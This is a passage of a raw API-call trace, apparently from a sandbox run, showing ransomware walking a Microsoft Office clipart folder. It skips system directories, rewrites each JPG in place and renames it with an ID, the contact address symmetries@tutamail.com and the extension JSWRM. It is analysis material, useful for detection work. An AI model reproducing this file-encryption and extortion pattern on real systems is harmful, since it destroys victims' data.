lpNumberOfBytesRead=0x345e89c*=0x1e70, lpOverlapped=0x0) returned 1 [0089.648] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.648] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1e70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1e70, lpOverlapped=0x0) returned 1 [0089.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0089.649] CloseHandle (hObject=0x314) returned 1 [0089.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0089.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0089.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0089.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0089.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0089.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0089.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.649] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341634.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341634.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341634.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341634.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0089.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0089.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0089.650] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4794eb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4794eb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4794eb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3615, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0341636.JPG", cAlternateFileName="")) returned 1 [0089.650] lstrcmpiW (lpString1="J0341636.JPG", lpString2=".") returned 1 [0089.650] lstrcmpiW (lpString1="J0341636.JPG", lpString2="..") returned 1 [0089.650] lstrcmpiW (lpString1="J0341636.JPG", lpString2="...") returned 1 [0089.650] lstrcmpiW (lpString1="J0341636.JPG", lpString2="windows") returned -1 [0089.650] lstrcmpiW (lpString1="J0341636.JPG", lpString2="recovery") returned -1 [0089.650] lstrcmpiW (lpString1="J0341636.JPG", lpString2="perflogs") returned -1 [0089.650] lstrcmpiW (lpString1="J0341636.JPG", lpString2="documents and settings") returned 1 [0089.650] lstrcmpiW (lpString1="J0341636.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.650] lstrcmpiW (lpString1="J0341636.JPG", lpString2="system volume information") returned -1 [0089.650] lstrcmpiW (lpString1="J0341636.JPG", lpString2="msocache") returned -1 [0089.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0089.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341636.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341636.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341636.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0089.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0089.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341636.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341636.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341636.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0089.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0089.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0089.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0089.651] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341636.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341636.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.651] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13845) returned 1 [0089.651] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3610) returned 0x24d210 [0089.652] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3610, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3610, lpOverlapped=0x0) returned 1 [0089.655] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.655] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3610, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3610, lpOverlapped=0x0) returned 1 [0089.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.655] CloseHandle (hObject=0x314) returned 1 [0089.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0089.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0089.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0089.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0089.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0089.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0089.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.656] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341636.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341636.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341636.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341636.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0089.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0089.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0089.657] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4794eb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4794eb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4794eb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2026, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0341645.JPG", cAlternateFileName="")) returned 1 [0089.657] lstrcmpiW (lpString1="J0341645.JPG", lpString2=".") returned 1 [0089.657] lstrcmpiW (lpString1="J0341645.JPG", lpString2="..") returned 1 [0089.657] lstrcmpiW (lpString1="J0341645.JPG", lpString2="...") returned 1 [0089.657] lstrcmpiW (lpString1="J0341645.JPG", lpString2="windows") returned -1 [0089.657] lstrcmpiW (lpString1="J0341645.JPG", lpString2="recovery") returned -1 [0089.657] lstrcmpiW (lpString1="J0341645.JPG", lpString2="perflogs") returned -1 [0089.657] lstrcmpiW (lpString1="J0341645.JPG", lpString2="documents and settings") returned 1 [0089.657] lstrcmpiW (lpString1="J0341645.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.657] lstrcmpiW (lpString1="J0341645.JPG", lpString2="system volume information") returned -1 [0089.657] lstrcmpiW (lpString1="J0341645.JPG", lpString2="msocache") returned -1 [0089.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0089.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341645.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341645.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341645.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0089.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0089.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341645.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341645.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341645.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0089.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0089.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0089.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0089.657] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341645.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341645.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.658] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8230) returned 1 [0089.658] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2020) returned 0x205850 [0089.658] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2020, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2020, lpOverlapped=0x0) returned 1 [0089.660] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.660] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2020, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2020, lpOverlapped=0x0) returned 1 [0089.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0089.660] CloseHandle (hObject=0x314) returned 1 [0089.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0089.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0089.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0089.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0089.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0089.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0089.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.661] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341645.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341645.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341645.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341645.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0089.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0089.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0089.662] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4794eb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4794eb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4794eb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3df7, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0341653.JPG", cAlternateFileName="")) returned 1 [0089.662] lstrcmpiW (lpString1="J0341653.JPG", lpString2=".") returned 1 [0089.662] lstrcmpiW (lpString1="J0341653.JPG", lpString2="..") returned 1 [0089.662] lstrcmpiW (lpString1="J0341653.JPG", lpString2="...") returned 1 [0089.662] lstrcmpiW (lpString1="J0341653.JPG", lpString2="windows") returned -1 [0089.662] lstrcmpiW (lpString1="J0341653.JPG", lpString2="recovery") returned -1 [0089.662] lstrcmpiW (lpString1="J0341653.JPG", lpString2="perflogs") returned -1 [0089.662] lstrcmpiW (lpString1="J0341653.JPG", lpString2="documents and settings") returned 1 [0089.662] lstrcmpiW (lpString1="J0341653.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.662] lstrcmpiW (lpString1="J0341653.JPG", lpString2="system volume information") returned -1 [0089.662] lstrcmpiW (lpString1="J0341653.JPG", lpString2="msocache") returned -1 [0089.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0089.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341653.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341653.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341653.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0089.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0089.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341653.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341653.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341653.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0089.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0089.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0089.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0089.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341653.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341653.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.663] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15863) returned 1 [0089.663] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3df0) returned 0x24d210 [0089.663] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3df0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3df0, lpOverlapped=0x0) returned 1 [0089.667] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.667] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3df0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3df0, lpOverlapped=0x0) returned 1 [0089.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.668] CloseHandle (hObject=0x314) returned 1 [0089.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0089.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0089.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0089.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0089.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 